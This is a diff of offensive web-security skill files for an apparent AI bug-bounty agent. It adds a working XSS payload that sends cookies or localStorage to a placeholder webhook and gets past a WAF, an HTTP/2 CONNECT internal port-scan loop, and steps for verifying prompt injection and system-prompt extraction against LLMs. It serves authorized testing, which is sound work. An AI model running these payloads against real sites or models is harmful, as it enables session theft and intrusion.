-grep -rn "function.*sanitiz\|function.*escape\|function.*clean\|function.*filter" \
-  --include="*.js" --include="*.ts" src/
+# Find custom sanitizers (WARNING: verify implementation before trusting)
+rg "function.*(sanitiz|escape|clean|filter)" --type js --type ts -n src/
 ```
 
 For custom sanitizers: apply the `custom-sanitizer-audit` skill (Five-Point Checklist).
-For DOMPurify: check version and config — see `dompurify-mxss-bypass` skill.
+For DOMPurify: check version and config -- see `dompurify-mxss-bypass` skill.
 
-## 4. AST-based analysis (optional)
+**Checkpoint:** For each custom sanitizer found, read the implementation. A function named `escapeHTML` that is NOT a standard library must be reviewed for bypass potential before marking flows through it as safe.
 
-For large codebases, use tooling:
+## 4. AST-based analysis (large codebases)
+
 - **Semgrep**: `semgrep --config p/javascript` for DOM XSS rules
 - **CodeQL**: `javascript/ql/src/Security/CWE-079` for taint tracking
 - **ESLint**: `no-unsanitized/property`, `no-unsanitized/method`
 
-## 5. Cross-validate findings
-
-Before reporting, reduce false positives by cross-referencing:
-- Compare grep-based sink hits (steps 1-2) against AST taint-tracking results (step 4) — a finding confirmed by both methods is high-confidence
-- For grep-only hits: manually verify the data flow in context (minified code aliasing can produce false matches)
-- For AST-only hits: confirm the sink pattern wasn't missed by grep regex limitations
-- Discard any finding where the source is provably non-attacker-controlled after contextual review
-
-## 6. Report findings
+## 5. Report findings
 
 For each confirmed source-to-sink flow:
 - File, line number, sink type
@@ -91,9 +76,5 @@ For each confirmed source-to-sink flow:
 - Exploitability assessment
 - Recommended fix
 
-## 7. Library-specific XSS gadgets
-
-See `GADGETS.md` for jQuery `.text()` re-decoding, moment.js format injection, and `javascript:` URI hostname bypass patterns.
-
 ## Chain With
-- `dom-vulnerability-detection` (dynamic analysis), `csp-bypass` (CSP blocks), `dompurify-mxss-bypass` (DOMPurify), `aem-sling-exploitation` (AEM-specific XSS gadgets)
+- `dom-vulnerability-detection` (dynamic analysis), `csp-bypass` (CSP blocks), `custom-sanitizer-audit` (homegrown sanitizer), `dompurify-mxss-bypass` (DOMPurify)

--- a/capabilities/web-security/skills/exploit-verifier/SKILL.md
+++ b/capabilities/web-security/skills/exploit-verifier/SKILL.md
@@ -22,7 +22,7 @@ Determine if the vulnerability CAN exist given the target's observable state.
 - Are there visible protections that would prevent exploitation? (WAF headers, CSP, CORS policy, input type restrictions)
 - Does the response indicate the input reaches server-side processing?
 
-**Decision:** PASS → proceed to Phase 2. FAIL → verdict: False Positive.
+**Checkpoint:** Document all checks performed. If FAIL, stop and issue False Positive verdict with justification.
 
 ### Phase 2: Dynamic Trigger
 
@@ -32,7 +32,7 @@ Send the payload and confirm it reaches the vulnerable code path.
 - Is there a behavioral difference between normal and malicious input? (response content, status code, timing, headers)
 - Does error output indicate the payload reached backend logic?
 
-**Decision:** PASS → proceed to Phase 3. FAIL → verdict: False Positive.
+**Checkpoint:** Record the request/response pair showing behavioral difference. If FAIL, stop and issue False Positive verdict.
 
 ### Phase 3: Sink Confirmation
 
@@ -51,7 +51,7 @@ Prove the exploit reaches its intended sink and achieves impact.
 | Mass Assignment | Unauthorized field persisted after write |
 | JWT Bypass | Elevated access with forged/manipulated token |
 
-**Decision:** PASS → verdict: Confirmed. FAIL → verdict: Partial.
+**Checkpoint:** Capture evidence (screenshot, response body, OOB callback). PASS = Confirmed. FAIL = Partial (impact not fully proven).
 
 ## Decision Matrix
 

--- a/capabilities/web-security/skills/exploit-verifier/SKILL.md
+++ b/capabilities/web-security/skills/exploit-verifier/SKILL.md
@@ -1,6 +1,6 @@
 ---
 name: exploit-verifier
-description: Sentinel-V exploit verification agent for confirming bugs and exploits across web application, API, and AI/LLM pentesting. Use when verifying a reported vulnerability, confirming a finding, proving/disproving an exploit, generating a verification report, or checking for false positives.
+description: Sentinel-V exploit verification agent — replays exploit payloads, validates CVE applicability, generates proof-of-concept verification across web application, API, and AI/LLM pentesting. Use when verifying a reported vulnerability, confirming a finding, proving/disproving an exploit, generating a verification report, or checking for false positives.
 ---
 
 # Exploit Verifier (Sentinel-V)
@@ -64,78 +64,25 @@ Prove the exploit reaches its intended sink and achieves impact.
 
 ## Verification Guidance by Class
 
-### Web Application
+For detailed decision trees and step-by-step procedures, see the checklists:
+- Web: [references/checklists/web-verification-checklist.md](references/checklists/web-verification-checklist.md)
+- API: [references/checklists/api-verification-checklist.md](references/checklists/api-verification-checklist.md)
+- AI/LLM: [references/checklists/ai-llm-verification-checklist.md](references/checklists/ai-llm-verification-checklist.md)
 
-**XSS:** Check reflection context (attribute, tag body, JS string). Verify CSP doesn't block execution. Confirm payload renders unencoded in DOM — HTML-encoded output is a false positive.
+For detailed verification templates with report formatting, see:
+- [references/verification-templates/web-verification.md](references/verification-templates/web-verification.md)
+- [references/verification-templates/api-verification.md](references/verification-templates/api-verification.md)
+- [references/verification-templates/ai-llm-verification.md](references/verification-templates/ai-llm-verification.md)
 
-**SQL Injection:** Confirm parameter reaches database with error-based or boolean detection. Differentiate SQL-specific errors from generic errors. Time-based: confirm delay is significantly above baseline and repeatable.
+For AI/LLM payload library: [references/ai-payloads/llm-injection-payloads.md](references/ai-payloads/llm-injection-payloads.md)
 
-**SSRF:** Confirm server-side fetch occurs (not just client redirect). Test internal addresses and cloud metadata. Use OOB callbacks for blind SSRF.
+### Key Sink Confirmation Rules
 
-**Path Traversal:** Confirm file contents returned (not a default/error page). Test encoding variations if basic `../` is filtered.
+**Web:** XSS requires unencoded DOM rendering (HTML-encoded = FP). SQLi needs SQL-specific errors, not generic ones. SSRF must be server-side fetch, not client redirect. CSRF requires no SameSite + no CSRF token + confirmed state change.
 
-**CSRF:** Verify no SameSite cookie protection, no CSRF token requirement, and no custom header requirement. Confirm state change persists from cross-origin request.
+**API:** BOLA/IDOR needs two sessions proving cross-user data access (200 with own data = FP). Mass assignment must show persisted unauthorized fields. JWT bypass must grant elevated access.
 
-**Auth Bypass:** Test path manipulation, method override, header injection. Confirm actual access to protected content (not just a different status code).
-
-### API
-
-**BOLA/IDOR:** Requires two separate user sessions. Confirm User A can access User B's actual data (not just a 200 OK with empty/own data).
-
-**Mass Assignment:** Confirm unauthorized fields are persisted (not silently dropped). Check response after write to verify state change.
-
-**JWT Bypass:** Test `alg:none`, key confusion, weak secrets. Confirm forged token grants elevated access.
-
-**GraphQL:** Check introspection, depth limits, batch queries, field-level authorization. Introspection alone without sensitive data exposure is informational.
-
-**Rate Limiting:** Confirm bypass sustains past the limit. Header rotation that doesn't affect server-side detection is a false positive.
-
-### AI/LLM
-
-Reference: `references/ai-payloads/llm-injection-payloads.md` for payload library.
-
-**Direct Prompt Injection:** Confirm behavioral change (not just acknowledgment of the attempt). Cross-validate with multiple techniques.
-
-**Indirect Prompt Injection:** Embed payload in external content processed by the model. Confirm injection changed behavior (not just that it was ingested).
-
-**System Prompt Extraction:** Extract twice with different methods. Consistency indicates real extraction; contradictory results indicate hallucination.
-
-**Excessive Agency:** Confirm the action was actually performed (observable side effects), not just described by the model.
-
-**Data Exfiltration:** Confirm real sensitive data in output (not placeholder/fabricated data). Check for callback if using image/URL exfil.
-
-**Guardrail Circumvention:** Confirm restricted content was actually generated, not just engaged with in a non-violating way.
-
-## Common False Positive Patterns
-
-### Web Application
-| Reported Vuln | Common False Positive Cause |
-|---|---|
-| Reflected XSS | Payload reflected but HTML-encoded; CSP blocks execution |
-| SQL Injection | Generic error message not caused by SQL; WAF error page |
-| SSRF | URL validation rejects internal IPs; redirect not followed |
-| Path Traversal | Path normalized before file access; chroot prevents escape |
-| CSRF | SameSite cookies present; CORS blocks cross-origin POST |
-| Open Redirect | Redirect limited to same domain; path-only redirect |
-
-### API
-| Reported Vuln | Common False Positive Cause |
-|---|---|
-| BOLA/IDOR | 200 OK but returns own data, not other user's; public endpoint |
-| Mass Assignment | Extra fields silently dropped; no state change |
-| JWT None Bypass | Server validates signature regardless of algorithm claim |
-| Rate Limit Bypass | Header rotation ignored; rate limit is per-session |
-| GraphQL Introspection | Introspection available but no sensitive types exposed |
-
-### AI/LLM
-| Reported Vuln | Common False Positive Cause |
-|---|---|
-| Prompt Injection | Model acknowledges injection but refuses compliance |
-| System Prompt Extraction | Model generates plausible but fabricated instructions |
-| Excessive Agency | Model describes action but doesn't execute it |
-| Stop Token DoS | Tokens filtered from input before reaching model |
-| Guardrail Bypass | Model engages with framing but maintains restrictions |
-| Data Exfiltration | Model generates placeholder/fake data, not real user data |
+**AI/LLM:** Prompt injection needs behavioral change, not just acknowledgment. System prompt extraction needs consistency across two different methods. Excessive agency requires observable side effects, not just description.
 
 ## Verification Report Format
 

--- a/capabilities/web-security/skills/h2-connect-internal-scan/SKILL.md
+++ b/capabilities/web-security/skills/h2-connect-internal-scan/SKILL.md
@@ -1,6 +1,6 @@
 ---
 name: h2-connect-internal-scan
-description: Internal port scanning and SSRF via HTTP/2 CONNECT method. Use when target supports HTTP/2 and proxies may forward CONNECT requests to internal hosts.
+description: Internal port scanning and SSRF via HTTP/2 CONNECT method -- enumerates internal services, detects open ports, and bypasses firewall restrictions. Use when target supports HTTP/2 and proxies may forward CONNECT requests to internal hosts.
 ---
 
 # HTTP/2 CONNECT Internal Scan
@@ -9,29 +9,46 @@ description: Internal port scanning and SSRF via HTTP/2 CONNECT method. Use when
 - Target supports HTTP/2 (ALPN h2 negotiation succeeds)
 - Reverse proxy or load balancer in front of application
 - CONNECT method not explicitly blocked in H2 stream handlers
-- Need to map internal network from external position
 
-## Probe
-1. Establish HTTP/2 connection: `curl --http2 -v https://target.com`
-2. Send CONNECT requests per port on unique stream IDs:
-```
-:method: CONNECT
-:authority: 127.0.0.1:6379
-```
-3. Multiplex 10-50 simultaneous probes across single connection
-4. High-value internal ports: 6379 (Redis), 9200 (Elasticsearch), 5432 (Postgres), 27017 (MongoDB), 8080/8443 (internal apps), 3000 (Node), 11211 (Memcached)
-5. Evaluate responses:
-   - `:status 200` → open port (tunnel established)
-   - `:status 502/503` → port unreachable but CONNECT processed
-   - `RST_STREAM` → most reliable closed-port signal
+## Workflow
 
-## Indicators
-- Status 200 on internal IP:port combinations (tunnel established)
-- Different error codes for open vs closed ports (port scan confirmed)
-- Successful tunnel allows sending arbitrary protocol data to internal service
+### 1. Verify HTTP/2 support
+```bash
+curl --http2 -v https://target.com 2>&1 | grep "ALPN.*h2"
+```
+
+**Checkpoint:** If ALPN negotiation does not show `h2`, fall back to HTTP/1.1 CONNECT or try alternative SSRF vectors.
+
+### 2. Test single CONNECT request
+```bash
+# Using nghttp2 to send CONNECT to a known-open port
+nghttp -v "https://target.com" -H ":method: CONNECT" -H ":authority: 127.0.0.1:80"
+```
+
+**Checkpoint:** If RST_STREAM on all attempts, the proxy explicitly blocks CONNECT. Try `te0-request-smuggling` or `ssrf-redirect-loop` instead.
+
+### 3. Scan high-value internal ports
+```bash
+# Multiplexed port scan via H2 streams
+for port in 80 443 3000 5432 6379 8080 8443 9200 11211 27017; do
+  nghttp -v "https://target.com" \
+    -H ":method: CONNECT" -H ":authority: 127.0.0.1:${port}" \
+    2>&1 | grep "status=" &
+done
+wait
+```
+
+High-value ports: 6379 (Redis), 9200 (Elasticsearch), 5432 (Postgres), 27017 (MongoDB), 8080/8443 (internal apps), 3000 (Node), 11211 (Memcached).
+
+### 4. Evaluate responses
+- `:status 200` -- open port (tunnel established)
+- `:status 502/503` -- port unreachable but CONNECT processed
+- `RST_STREAM` -- most reliable closed-port signal
+
+**Checkpoint:** Successful tunnel (status 200) allows sending arbitrary protocol data to internal service. Verify by sending a protocol-specific probe through the tunnel.
 
 ## Chain With
-- ssrf-redirect-loop (if CONNECT is blind, chain with redirect loop for visibility)
+- blind-ssrf-chains (exploit discovered internal services)
 - te0-request-smuggling (if proxy handles H2, try smuggling variants)
 
 ## Reference

--- a/capabilities/web-security/skills/hackerone-recon/SKILL.md
+++ b/capabilities/web-security/skills/hackerone-recon/SKILL.md
@@ -1,104 +1,63 @@
 ---
 name: hackerone-recon
-description: Pre-engagement reconnaissance workflow using HackerOne MCP tools to enumerate program scope, study prior disclosures, and identify high-value targets before active testing.
+description: Pre-engagement reconnaissance workflow using HackerOne MCP tools to enumerate program scope, study prior disclosures, and identify high-value targets. Use when starting a new HackerOne program engagement, building an asset inventory, or planning target selection before active testing.
 ---
 
-# HackerOne Pre-Engagement Reconnaissance
+# HackerOne Pre-Engagement Recon
 
-Use this workflow at the start of any engagement against a HackerOne program. The goal is to fully understand the program's scope, rules, weakness taxonomy, and disclosure history before sending a single test request.
-
-## Prerequisites
-
-- HackerOne MCP server running with valid credentials (`H1_USERNAME` + `H1_API_TOKEN`)
-- Run `hackerone_health` to verify connectivity and confirm your profile
+Prerequisite: HackerOne MCP server running with valid credentials (`H1_USERNAME` + `H1_API_TOKEN`). Verify with `hackerone_health`.
 
 ## Phase 1: Program Intelligence
 
-### 1.1 Retrieve Program Details
-
+### 1.1 Retrieve program details
 ```
 hackerone_get_program(program_handle="<handle>")
 ```
+Extract: program type (bounty vs VDP), submission state, response metrics, bounty splitting, excluded vuln types, severity thresholds.
 
-Extract and note:
-- **Program type**: Bug Bounty (paid) vs VDP (no bounty). Adjust effort accordingly.
-- **Submission state**: Is the program currently accepting reports?
-- **Response metrics**: Average time to first response, resolution, and bounty award. Programs with slow triage (>30 days) require more patience and stronger evidence.
-- **Bounty splitting**: If enabled, consider collaboration.
-- **Policy**: Read the full policy. Look for:
-  - Excluded vulnerability types (often: DoS, social engineering, self-XSS, rate limiting)
-  - Required testing restrictions (no automated scanning, no production data access)
-  - Safe harbor language and scope limitations
-  - Minimum severity thresholds for bounty eligibility
+**Checkpoint:** If program is not accepting submissions, stop. If response metrics show >30 day triage, prepare stronger evidence.
 
-### 1.2 Enumerate Scope Assets
-
+### 1.2 Enumerate scope assets
 ```
 hackerone_get_program_scope(program_handle="<handle>")
 ```
+Record for each asset: type, identifier, bounty eligibility, max severity, per-asset instructions.
 
-For each asset, record:
-- **Asset type**: URL, WILDCARD, DOMAIN, CIDR, SOURCE_CODE, MOBILE_APPLICATION
-- **Asset identifier**: The actual target (e.g., `*.example.com`, `https://api.example.com`)
-- **Bounty eligibility**: Not all in-scope assets are bounty-eligible
-- **Max severity**: Some assets cap severity (e.g., staging environments capped at medium)
-- **Instructions**: Per-asset notes from the program (testing restrictions, focus areas)
+**Prioritize:** (1) bounty-eligible + critical severity cap, (2) wildcard domains, (3) API endpoints, (4) recently added assets.
 
-**Prioritize by:**
-1. Bounty-eligible assets with `max_severity: critical` — highest ROI
-2. Wildcard domains — largest attack surface, most likely to have overlooked subdomains
-3. API endpoints — often less hardened than main web apps
-4. Recently added assets (cross-reference with bbscope_updates if available)
-
-### 1.3 Map Accepted Weaknesses
-
+### 1.3 Map accepted weaknesses
 ```
 hackerone_get_program_weaknesses(program_handle="<handle>")
 ```
-
-This tells you which CWE categories the program accepts. Use it to:
-- Focus testing on accepted weakness types
-- Avoid wasting time on categories the program explicitly excludes
-- Note the weakness IDs — you will need them when submitting reports via `hackerone_submit_report`
+Record CWE categories accepted. You need `weakness_id` values for report submission.
 
 ## Phase 2: Prior Art Analysis
 
-### 2.1 Study Disclosed Reports (Hacktivity)
-
+### 2.1 Study disclosed reports
 ```
 hackerone_search_hacktivity(program="<handle>")
 ```
+Identify: previously found vuln types, bounty amounts by severity, triage patterns. Avoid duplicating known findings.
 
-Disclosed reports reveal:
-- **What has been found before** — if 5 researchers found XSS in the search page, find something different
-- **Bounty amounts by severity** — calibrate your expectations and prioritize accordingly
-- **Program's bug preferences** — some programs reward certain vulnerability classes more generously
-- **Triage patterns** — how the program classifies and responds to different finding types
-
-### 2.2 Review Your Own Report History
-
+### 2.2 Review your own history
 ```
 hackerone_search_reports(program="<handle>")
 ```
-
-If you have prior reports against this program:
-- Check for `informative` or `not-applicable` verdicts — understand what the program rejects
-- Review `duplicate` reports — what is already known
-- Check `triaged` or `new` reports — avoid testing the same surface while reports are pending
+Check for `informative`/`not-applicable` verdicts (understand rejections), `duplicate` (known issues), `triaged`/`new` (avoid testing same surface).
 
 ## Phase 3: Target Selection
 
-After completing Phases 1 and 2, synthesize your findings:
+1. Build asset inventory with types, bounty eligibility, max severity
+2. Cross-reference with hacktivity -- deprioritize heavily-tested surfaces
+3. Record `structured_scope_id` for each target
+4. Record `weakness_id` for expected vuln types
+5. Respect per-asset instructions and policy restrictions
 
-1. **Build the asset inventory**: All in-scope targets with their types, bounty eligibility, and max severity
-2. **Cross-reference with hacktivity**: Remove heavily-tested surface areas, prioritize under-explored assets
-3. **Identify the scope IDs**: For each target you plan to test, record its `structured_scope_id` — you will need this for report submission
-4. **Note the weakness IDs**: For vulnerability types you expect to find, record the `weakness_id` values
-5. **Set testing boundaries**: Respect per-asset instructions and program policy restrictions
+**Checkpoint:** Before active testing, confirm you have: scope IDs, weakness IDs, asset inventory, and have read the full program policy.
 
-## Phase 4: Report Submission (Post-Testing)
+## Phase 4: Report Submission
 
-When you have a confirmed finding (after the full pipeline: `assess_confidence` → `report-preflight` → `exploit-verifier` → `report-writer`):
+After the full pipeline (`assess_confidence` -> `report-preflight` -> `exploit-verifier` -> `report-writer`):
 
 ```
 hackerone_submit_report(
@@ -112,14 +71,12 @@ hackerone_submit_report(
 )
 ```
 
-Including `weakness_id` and `structured_scope_id` improves triage speed and demonstrates thoroughness.
-
-After submission, use `hackerone_get_report_activities` to monitor triage status and `hackerone_add_comment` to respond to triager questions.
+Monitor with `hackerone_get_report_activities`. Respond to triager questions via `hackerone_add_comment`.
 
 ## Anti-Patterns
 
-- **Do not skip Phase 1.** Testing without reading the policy wastes time on excluded categories and risks violating program rules.
-- **Do not submit without scope/weakness IDs.** Reports without these require manual triager classification and signal lower researcher quality.
-- **Do not submit unverified findings.** The reporting pipeline (`assess_confidence` → `report-preflight` → `exploit-verifier` → `report-writer`) exists for a reason. Skipping it leads to `informative` verdicts and damaged reputation.
-- **Do not ignore hacktivity.** Submitting duplicates of known issues damages your signal score.
-- **Do not test out-of-scope assets.** Even if you find something, it will be closed as `not-applicable`.
+- **Skipping Phase 1** -- wastes time on excluded categories, risks violating rules
+- **Submitting without scope/weakness IDs** -- signals low researcher quality
+- **Skipping verification pipeline** -- leads to `informative` verdicts
+- **Ignoring hacktivity** -- submitting known duplicates damages signal score
+- **Testing out-of-scope assets** -- findings closed as `not-applicable`

--- a/capabilities/web-security/skills/http-connection-contamination/SKILL.md
+++ b/capabilities/web-security/skills/http-connection-contamination/SKILL.md
@@ -29,6 +29,8 @@ dig +short sub1.example.com sub2.example.com
 echo | openssl s_client -connect sub1.example.com:443 2>/dev/null | openssl x509 -noout -text | grep -A1 "Subject Alternative Name"
 ```
 
+**Checkpoint:** Both conditions must hold: same IP AND shared cert (wildcard or multi-SAN). If either fails, connection coalescing will not occur.
+
 ### Step 2: Test for first-request routing
 In browser DevTools (Network tab), observe if requests to `sub2.example.com` reuse the connection ID established for `sub1.example.com`. If the response content comes from sub1's backend, the proxy uses first-request routing.
 

--- a/capabilities/web-security/skills/inline-script-breakout-exfil/SKILL.md
+++ b/capabilities/web-security/skills/inline-script-breakout-exfil/SKILL.md
@@ -1,0 +1,100 @@
+---
+name: inline-script-breakout-exfil
+description: "Exfiltrate data from stored XSS inside inline script blocks when constrained by unquoted HTML attribute context, WAF, and CSP. Use when XSS payload lands inside server-rendered inline script and standard exfil (fetch, eval, atob) is blocked."
+---
+
+# Inline Script Breakout Exfiltration
+
+## The Constraint Problem
+
+After `</script>` closes an inline script tag, the browser's HTML parser takes over. If the payload lands in a JSON string value:
+
+```html
+<script>window.config = {"user":{"name":"</script><img src=x onerror=HANDLER>","role":"admin"}};</script>
+```
+
+The `onerror=HANDLER` is an **unquoted HTML attribute**. These characters terminate unquoted attribute values: `=`, `"`, `'`, space, `<`, `>`, backtick.
+
+### What's eliminated
+
+`eval('code')`, `atob("base64")`, `fetch('/path')`, `new XMLHttpRequest()`, `var x = 1`, `x = document.cookie` -- all contain forbidden characters.
+
+### What still works
+
+`alert(document.domain)`, `location.replace(URL)`, `String.fromCharCode(N,N,N)`, nested calls like `X(Y(Z))`, concatenation with `+`.
+
+## The Exfiltration Technique
+
+### Pattern: `location.replace(String.fromCharCode(...)+document.cookie)`
+
+```
+</script><img src=x onerror=location.replace(String.fromCharCode(CHARCODE_URL)+document.cookie)>
+```
+
+**Why this works:**
+1. `location.replace()` -- navigates the page (method call, no `=`)
+2. `String.fromCharCode(104,116,116,112,...)` -- builds URL without quotes
+3. `+document.cookie` -- concatenates readable cookies
+4. Navigation is NOT governed by CSP `connect-src`
+5. No WAF trigger patterns present
+
+### Building the payload
+
+```python
+callback = "https://YOUR-WEBHOOK.example.com/callback?c="
+char_codes = ",".join(str(ord(c)) for c in callback)
+
+payload = f"</script><img src=x onerror=location.replace(String.fromCharCode({char_codes})+document.cookie)>"
+
+# Verify no forbidden chars in onerror value
+onerror = payload.split("onerror=")[1].rstrip(">")
+forbidden = [c for c in onerror if c in ' "\'=<>`']
+assert not forbidden, f"Forbidden chars: {forbidden}"
+```
+
+### Payload variants
+
+**Exfil URL/path:** `onerror=location.replace(String.fromCharCode(...)+location.href)`
+
+**Exfil localStorage:** `onerror=location.replace(String.fromCharCode(...)+localStorage.getItem(String.fromCharCode(107,101,121)))`
+
+## Identifying Injection Targets
+
+Server-rendered HTML containing user-controlled data inside `<script>` blocks:
+
+| SDK/Pattern | Injection field |
+|-------------|-----------------|
+| LaunchDarkly | `user.name`, `user.email` in context |
+| Segment/Analytics | User traits in `analytics.identify()` |
+| Next.js SSR | Page props in `__NEXT_DATA__` |
+| Nuxt.js SSR | State in `window.__NUXT__` |
+| Django templates | `{{ variable\|safe }}` |
+| Statsig/PostHog | User attributes in init |
+
+### Verification steps
+
+1. Set canary value in suspected field (e.g., `XSSCANARY123`)
+2. Fetch page and search for canary in inline scripts
+3. Check if `</script>` is escaped (`\u003c/script>` or `&lt;/script&gt;`)
+4. If NOT escaped, inject `</script><img src=x onerror=alert(document.domain)>`
+5. If alert fires, use `String.fromCharCode` exfil technique
+
+## WAF Bypass Summary
+
+| Payload pattern | Verdict | Why |
+|-----------------|---------|-----|
+| `<script>fetch(...)</script>` | BLOCKED | `<script>` tag |
+| `<img onerror=eval(atob("..."))>` | BLOCKED | `eval(atob(` |
+| `<img onerror=location.replace(String.fromCharCode(...)+document.cookie)>` | PASSED | No trigger patterns |
+
+## Limitations
+
+- `HttpOnly` cookies are NOT in `document.cookie` -- but same-origin fetch sends them automatically
+- The redirect is visible to the victim (not stealthy)
+- Very long URLs may be truncated by the browser
+
+## Related Skills
+
+- **self-xss-escalation** -- When XSS only fires in your own session
+- **csp-bypass** -- When CSP blocks inline scripts entirely
+- **dom-vulnerability-detection** -- Finding client-side sinks

--- a/capabilities/web-security/skills/insecure-defaults/SKILL.md
+++ b/capabilities/web-security/skills/insecure-defaults/SKILL.md
@@ -1,0 +1,63 @@
+---
+name: insecure-defaults
+description: "Detect fail-open insecure defaults: hardcoded secrets, weak auth, permissive security that allow apps to run insecurely in production. Use when auditing security configuration, reviewing environment variable handling, or analyzing deployment files."
+---
+
+# Insecure Defaults Detection
+
+Finds **fail-open** vulnerabilities where apps run insecurely with missing configuration.
+
+- **Fail-open (CRITICAL):** `SECRET = env.get('KEY') or 'default'` -- App runs with weak secret
+- **Fail-secure (SAFE):** `SECRET = env['KEY']` -- App crashes if missing
+
+## When NOT to Use
+
+- Test fixtures in `test/`, `spec/`, `__tests__/`
+- Example/template files (`.example`, `.template`, `.sample`)
+- Documentation examples in README.md or docs/
+- Build-time configuration replaced during deployment
+- Crash-on-missing behavior (fail-secure)
+
+## Workflow
+
+### 1. SEARCH: Find Insecure Defaults
+
+Search `**/config/`, `**/auth/`, `**/database/`, and env files for:
+- **Fallback secrets:** `getenv.*\) or ['"]`, `process\.env\.[A-Z_]+ \|\| ['"]`
+- **Hardcoded credentials:** `password.*=.*['"][^'"]{8,}['"]`, `api[_-]?key.*=.*['"][^'"]+['"]`
+- **Weak defaults:** `DEBUG.*=.*true`, `AUTH.*=.*false`, `CORS.*=.*\*`
+- **Crypto algorithms:** `MD5|SHA1|DES|RC4|ECB` in security contexts
+
+### 2. VERIFY: Trace Runtime Behavior
+
+- When is this code executed? (Startup vs. runtime)
+- What happens if the configuration variable is missing?
+- Is there validation that enforces secure configuration?
+
+### 3. CONFIRM: Production Impact
+
+- If production config provides the variable: lower severity (but still code-level vulnerability)
+- If production config missing or uses default: CRITICAL
+
+### 4. REPORT: with Evidence
+
+```
+Finding: Hardcoded JWT Secret Fallback
+Location: src/auth/jwt.ts:15
+Pattern: const secret = process.env.JWT_SECRET || 'default';
+Verification: App starts without JWT_SECRET; secret used in jwt.sign()
+Exploitation: Attacker forges JWTs using 'default', gains unauthorized access
+```
+
+## Quick Verification Checklist
+
+| Category | Pattern | Verify | Skip |
+|----------|---------|--------|------|
+| Fallback Secrets | `env.get(X) or Y` | App starts without var? Used in crypto/auth? | Test fixtures |
+| Default Credentials | Hardcoded user/pass | Active in deploy? No override? | Disabled accounts |
+| Fail-Open Security | `AUTH_REQUIRED = env.get(X, 'false')` | Default is insecure? | Default is secure |
+| Weak Crypto | MD5/SHA1/DES in security | Used for passwords/tokens? | Non-security checksums |
+| Permissive Access | CORS `*`, permissions `0777` | Default allows unauth access? | Justified permissiveness |
+| Debug Features | Stack traces, introspection | Enabled by default? In responses? | Logging-only |
+
+For detailed examples and counter-examples, see [references/examples.md](references/examples.md).

--- a/capabilities/web-security/skills/insecure-defaults/references/examples.md
+++ b/capabilities/web-security/skills/insecure-defaults/references/examples.md
@@ -1,0 +1,148 @@
+# Insecure Defaults: Examples and Counter-Examples
+
+## Fallback Secrets
+
+### VULNERABLE - Report These
+
+```python
+# src/auth/jwt.py
+SECRET_KEY = os.environ.get('SECRET_KEY', 'dev-secret-key-123')
+# App runs with known secret if SECRET_KEY is missing. Attacker forges tokens.
+```
+
+```javascript
+// config/database.js
+const DB_PASSWORD = process.env.DB_PASSWORD || 'admin123';
+// Database accepts hardcoded password in production if env var missing.
+```
+
+```ruby
+# config/secrets.rb
+Rails.application.credentials.secret_key_base =
+  ENV.fetch('SECRET_KEY_BASE', 'fallback-secret-base')
+# Rails session encryption uses weak known key as fallback.
+```
+
+### SECURE - Skip These
+
+```python
+SECRET_KEY = os.environ['SECRET_KEY']  # Raises KeyError if missing - fail-secure
+```
+
+```javascript
+if (!process.env.DB_PASSWORD) {
+  throw new Error('DB_PASSWORD environment variable required');
+}
+```
+
+## Default Credentials
+
+### VULNERABLE
+
+```python
+def bootstrap_admin():
+    if not User.query.filter_by(role='admin').first():
+        admin = User(username='admin', password=hash_password('admin123'), role='admin')
+        db.session.add(admin)
+# Default admin account created on first run with known credentials.
+```
+
+### SECURE
+
+```python
+def bootstrap_admin():
+    username = os.environ['ADMIN_USERNAME']  # Crashes if not configured
+    password = os.environ['ADMIN_PASSWORD']
+```
+
+## Fail-Open Security
+
+### VULNERABLE
+
+```python
+# Default is no authentication
+REQUIRE_AUTH = os.getenv('REQUIRE_AUTH', 'false').lower() == 'true'
+```
+
+```javascript
+// Default allows requests from any origin
+const allowedOrigins = process.env.ALLOWED_ORIGINS || '*';
+app.use(cors({ origin: allowedOrigins }));
+```
+
+```python
+# Debug mode default - stack traces leak info in production
+DEBUG = os.getenv('DEBUG', 'true').lower() != 'false'
+```
+
+### SECURE
+
+```python
+REQUIRE_AUTH = os.getenv('REQUIRE_AUTH', 'true').lower() == 'true'  # Default: true
+```
+
+## Weak Crypto
+
+### VULNERABLE
+
+```python
+# MD5 for password hashing
+def hash_password(password):
+    return hashlib.md5(password.encode()).hexdigest()
+```
+
+```java
+// DES with ECB mode
+Cipher cipher = Cipher.getInstance("DES/ECB/PKCS5Padding");
+```
+
+### SECURE - Skip
+
+```python
+# MD5 for non-security cache key
+def cache_key(data):
+    return hashlib.md5(data.encode()).hexdigest()  # OK - just cache lookup
+```
+
+## Permissive Access
+
+### VULNERABLE
+
+```python
+fd = os.open(path, os.O_CREAT | os.O_WRONLY, 0o666)  # World-writable
+```
+
+```python
+response.headers['Access-Control-Allow-Origin'] = '*'
+response.headers['Access-Control-Allow-Credentials'] = 'true'
+# CORS misconfiguration - allows credential theft from any site
+```
+
+## Debug Features
+
+### VULNERABLE
+
+```python
+@app.errorhandler(Exception)
+def handle_error(error):
+    return jsonify({
+        'error': str(error),
+        'traceback': traceback.format_exc()  # Leaks internal paths
+    }), 500
+```
+
+```javascript
+const server = new ApolloServer({
+  introspection: true,   // Schema discovery in production
+  playground: true
+});
+```
+
+### SECURE
+
+```python
+@app.errorhandler(Exception)
+def handle_error(error):
+    logger.exception('Request failed', exc_info=error)  # Logs full trace
+    return jsonify({'error': 'Internal server error'}), 500  # Generic to user
+```

--- a/capabilities/web-security/skills/jxscout-bookmarks/SKILL.md
+++ b/capabilities/web-security/skills/jxscout-bookmarks/SKILL.md
@@ -104,40 +104,17 @@ jxscout-pro-v2 -c bookmark delete --id <bookmark_id>
 2. Create a group if none fits: `jxscout-pro-v2 -c bookmark create-group --name "XSS sinks"`
 3. Create bookmarks with notes as you find interesting code
 
-## When to bookmark
+**Checkpoint:** After creating a group, run `bookmark list-groups` to verify. After creating bookmarks, run `bookmark list --group "Name"` to confirm.
 
-Bookmark things the user would want to review or come back to:
+## What to bookmark
 
-- **Sinks**: `innerHTML` assignments, `document.write`, `eval`, `location.href` assignments with user-controlled input
-- **Message handlers**: `window.addEventListener("message", ...)` -- especially without origin checks
-- **Auth logic**: token validation, session handling, role checks in client-side code
-- **Request construction**: places where API calls are built, especially with user-controlled parameters
-- **Interesting gadgets**: JSONP callbacks, script injection points, DOM clobbering targets
-- **Data flows**: where sensitive data moves from one component to another
